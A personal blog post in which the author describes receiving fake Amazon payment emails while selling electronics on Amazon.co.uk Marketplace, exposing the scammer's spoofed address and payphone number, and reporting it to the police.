Amazon Adventures - Part Deux

Finally, here is the much promised second part of my recent Amazon Adventures. I warn you now, this is going to be a long post, you have been warned! ;-)

Part one can be found here.

This part is going to cover my recent adventures when trying to sell some things which were excess to requirements using the Amazon.co.uk Marketplace, which works a bit like eBay, but without scammers and con artists popping out of the woodwork every few seconds; or so I thought. How wrong I was to believe things would be any better on Amazon.co.uk's Marketplace than eBay.

The tale unfolds below:

So, as I mentioned above I had some electronic and other goods that were excess to requirements, these were in immaculate [almost new] condition as I had treated them with respect and care at all times. So, I created a Marketplace account on the Amazon.co.uk site so that I could offer these items for sale. This step was dead easy and I had a Marketplace shop open on Amazon.co.uk within five minutes. I confirmed this by searching for one of the items on Amazon.co.uk and it appeared [along with my Marketplace seller account name] in the new and used listings.

A few hours passed and I started to receive e-mails from prospective buyers of the most expensive of the electrical items I was trying to sell, here's a screenshot of one of the e-mails:



I replied promptly and gave the prospective buyer the benefit of the doubt, even though alarm bells were already starting to go off in my head. The next morning I received the following e-mail from 'Vannessa' [screenshot below]:



Hmmm... I thought that was most interesting, especially as I had also received another e-mail which claimed to come from the Amazon.co.uk payments e-mail address, or did it? Here's a screenshot of the e-mail below; notice anything odd?


Looks real, doesn't it, but is it really from Amazon or not, yes or no? [Hint: look at the e-mail address shown between the '<' and '>' characters.]

Anyway, by now I knew it wasn't really from Amazon.co.uk, as the real e-mail address it came from was 'amazoncustoms@accountant.com', which is a FREE e-mail account from 'Mail.com' in the US. I decided to check my account on Amazon.co.uk Marketplace, and as expected the item was still listed as being available, not sold. At this point I decided to do a little more detective work.

So, to start my digging, I did a lookup on the UK Post Code given by the 'buyer', this being 'BL2 1LW' which resolved as the following address:

13 ST AUBINS ROAD
BOLTON
LANCASHIRE

Now, if you noticed, the 'buyer' claimed her address was '13 st aubin road'; notice not only the lower case, but also the missing 's' off the end of 'aubin'. By now I was fully convinced that this was a scammer trying to defraud me of my electronic device. So, I replied to her, see the screenshot below:



And 'Vanessa' replied thus:



In between the various e-mails, I did a bit more digging and found out that the address was the registered office for a company which has now been 'dissolved'. So, to turn the screw a little tighter I sent a reply which you can see below:



And 'Vanessa' replied thus:



And thus, about 15 minutes later:


By now I think that 'Vanessa' knew that I had rumbled that this was a scam, or she was getting desperate, so I tried to string her along a little longer and see if I could extract a telephone number from 'her'. Here's the e-mail I sent:



I never expected to hear anything more from 'Vanessa', so I was rather surprised when I got the following reply:



Those of you that live in or know the phone number system in the UK will have immediately noticed that the phone number I had been given was not in Bolton, or indeed anywhere near there. It was in fact a London telephone number, and a quick bit of digging unearthed the fact that it was a BT Pay Phone! Game, Set and Match to me, I think.

Further digging seemed to indicate that the phone was on the West side of Lambeth Bridge, in Horseferry Road, which ironically is less than 300m from New Scotland Yard!

My next move was to send all the data on to the fraud department of the London Metropolitan Police. As far as I was concerned, my job was now done; it was now down to the Police to apprehend the fraudster(s).

Over the next week, I received four other similar fake Amazon payments notices; needless to say, I played them along the same way and then sent the data on to the authorities to act on[*]. However, I'm not holding my breath, as these frauds are small fry in a world of sharks.

Needless to say, I finally decided that using Amazon.co.uk's Marketplace was not a good way to sell expensive electronic items, in fact I'd go as far as to say that it is only marginally better than eBay in this respect. I must make it clear that my comments are only about my personal experience of using the Marketplace feature of Amazon.co.uk, I have found all my other dealings with Amazon.co.uk to be safe and reliable and I generally trust them far more than other online stores. In fact they are one of the stores I use the most when I'm thinking of buying things, be it CDs, Books, Electronic Items or whatever.

[*] I also e-mailed and spoke to Amazon.co.uk's fraud team a number of times while these adventures unfolded; they were polite and efficient, but I was left feeling that they were not at all surprised about this level of fraud on their site, and seemed to have no answer to the problem. The problem seems to be worse when selling high value electronic items, such as phones, PDAs or game consoles.
